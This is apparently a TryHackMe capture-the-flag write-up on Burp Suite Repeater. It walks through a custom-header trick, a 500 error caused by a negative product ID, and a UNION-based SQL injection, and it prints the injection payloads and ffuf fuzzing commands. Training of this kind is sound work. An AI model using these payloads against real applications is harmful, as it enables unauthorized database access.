Introduction

We covered the basics of the Repeater in Burp Suite and we presented an example using SQL injection scenario. This was part of TryHackMe JR Penetration Tester pathway.

We will be covering how to use Repeater to manipulate and arbitrarily resend captured requests, as well as looking at some of the niftier options available in this awesome tool. Finally, we will encounter a series of examples, including a real-world, extra-mile exercise which we will use to consolidate the more theoretical aspects of the room.

If you have not used Burp Suite before and have not completed the Burp Basics room, you may wish to do so now before continuing, as this room builds on the foundations covered there.

In short: Burp Suite Repeater allows us to craft and/or relay intercepted requests to a target at will. In layman’s terms, it means we can take a request captured in the Proxy, edit it, and send the same request repeatedly as many times as we wish. Alternatively, we could craft requests by hand, much as we would from the CLI (Command Line Interface), using a tool such as cURL to build and send requests.

This ability to edit and resend the same request multiple times makes Repeater ideal for any kind of manual poking around at an endpoint, providing us with a nice Graphical User Interface (GUI) for writing the request payload and numerous views (including a rendering engine for a graphical view) of the response so that we can see the results of our handiwork in action.

Finding a Flag with a Custom Header

In the first challenge, I had to find a flag by adding a custom HTTP header to my request. I sent a normal request to the main page to Repeater and then added a new header: flag_authorized: true.

A key trick here, and something that can trip you up, is that you need to make sure there are two blank lines at the very end of your request after adding the header. Without this proper formatting, the server won’t process it correctly. Once I added the header and the blank lines and sent the request, the flag appeared right in the response.

Triggering a 500 Error

The next challenge was to cause a “500 Internal Server Error.” I targeted the products page, which used a numerical ID in the URL to identify different products. I tried a bunch of things: non-existent IDs, special characters, and even used a web fuzzer called ffuf to automate the process. None of that worked.

The solution turned out to be surprisingly simple: I just needed to enter a negative number (like -1) as the product ID. The application wasn’t expecting a negative value, which caused it to crash and throw a 500 error, revealing the next flag in the error message.

Fun with SQL Injection

For the final challenge, I targeted the “about” page, which displayed team members based on an ID in the URL. This immediately screamed “SQL database” to me.

  1. Finding the Vulnerability: I started by sending a single apostrophe (') as the ID. This classic trick caused a 500 error and, helpfully, the error message dumped the entire SQL query the server was trying to run. This gave me the table name (people) and a list of column names.
  2. Dumping All Columns: To see if there were any other interesting columns, I crafted a UNION ALL SELECT query. I used GROUP_CONCAT(column_name) to pull all column names from the information_schema.columns table for the people table. This query revealed a hidden notes column.
  3. Getting the Flag: I knew the CEO’s ID was 1, and now I knew about the notes column. So, I put together my final SQL injection payload: 0 UNION ALL SELECT notes, NULL, NULL, NULL, NULL FROM people WHERE id = 1. This query tricked the database into returning the contents of the notes column for the CEO instead of the normal information. And, of course, the CEO’s notes contained the final flag.

Technical Commands

Here are the ffuf commands I ran in my terminal during the second challenge:

  • ffuf -x get -w /usr/share/wordlists/seclists/Fuzzing/local_ports.txt -fc 200 http://<IP_ADDRESS>/products/FUZZ
  • ffuf -x get -w /usr/share/wordlists/seclists/Fuzzing/uri_hex.txt -fc 500 http://<IP_ADDRESS>/products/FUZZ

TryHackMe Room Answers

Which view option displays the response in the same format as your browser would?

Send the request. What is the flag you receive?

What is the flag you receive when you cause a 500 error in the endpoint?

Exploit the union SQL injection vulnerability in the site.

What is the flag?

Video Walk-Through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles